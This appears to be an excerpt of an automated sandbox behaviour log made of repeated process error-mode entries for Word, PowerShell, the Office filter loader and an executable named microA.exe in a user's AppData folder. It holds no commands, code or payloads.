Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
